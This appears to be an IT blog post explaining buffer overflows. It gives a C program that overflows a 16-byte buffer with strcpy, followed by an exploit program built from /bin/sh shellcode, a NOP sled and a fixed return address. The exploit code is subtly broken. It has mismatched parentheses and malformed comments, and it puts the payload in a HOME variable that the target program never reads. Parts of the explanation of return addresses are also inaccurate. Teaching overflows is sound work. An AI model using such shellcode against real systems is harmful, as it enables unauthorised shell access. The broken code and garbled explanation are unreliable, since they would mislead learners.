Next Horizon - Networking and Technology

Many people ask, how do Hackers do what they do? How do they gain access to systems? Well basically they probe and prod until they find a vulnerability. The most common vulnerability is a buffer overflow of poorly written software. Remember most real hackers don’t want to crash a system, they want control of it. So with a buffer overflow a hacker stuffs more data into a programmers buffer than what it can handle. By doing this and using some creative memory inspection tools, the hacker can see what memory location in the stack was going to be executed next. Knowing this information can allow the hacker to inject additional code to modify the return address therefor executing an additional program, in most cases a shell prompt.

So what does a poorly written program that is susceptible to an overflow look like?

Precompiled program called Overflow

void overflow(char *str) {
   char buffer[16];

   strcpy(buffer,str);
}

void main() {
  char Lstring[256];
  int i;

  for( i = 0; i < 255; i++)
    Lstring[i] = 'A';

  overflow (Lstring);
}

This simple program has the typical buffer over flow error and copies a supplied string without having bounds checking by using strcpy() instead of strncpy(). If you run this program you will get a segmentation violation. The Buffer of the array is set to “16” in the overflow function while the for loop is looping the letter A 255 times, therefore overflowing the buffer.

Once you execute the vulnerable program and overrun the buffer you will most likely get a long string of characters. These Characters are the return address of the next function call for the program. To properly exploit the buffer you will need to convert these strings to Hex. So for example if the return address space is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…… then your return address is 41414141. By knowing the return address space and some little basic math you can inject a new return address space into the buffer of another program which could potentially execute a shell for a hacker to gain control over. Sorry readers I’m not going to show you how to do it but basically you do the following

* Define the shellcode in hex */

static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
/* Define your address space */
#define NOP     0x90
#define LEN     1032
#define RET     0xbffff574

*/ Exploit Program*/

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;

fprintf(stderr,"using address 0x%lx\n",retaddr);

for (i=0 ;i < LEN ; i+=4)
   *(long *)&buffer[i] = retaddr;

for (i=0  ;i< LEN - strlen ( shellcode)-100);i++)
   *(buffer+i) = NOP;

/* after the end of the NOPs, we copy in the execve() shellcode */

memcpy(buffer+i,shellcode,strlen(shellcode));

/* export the variable, run Overflow */

setenv("HOME", buffer, 1);
execlp("Overflow "," Overflow" ,NULL);
return 0;
}

Note this is an attack example, and is only used for demonstration purposes.

So while a computer is relatively safe from hacking as long as you are using the proper devices, firewalls and anti-virus/anti-malware software, they are still susceptible if you install untrusted software. Therefore, this is why most IT departments will lock down your ability to install software. Trust me it’s not because we like to keep busy… It’s because we want to make sure the systems we manage stay in our control. It’s also the responsibility of the programmers to write secure programs especially in secure or publicly accessible environments.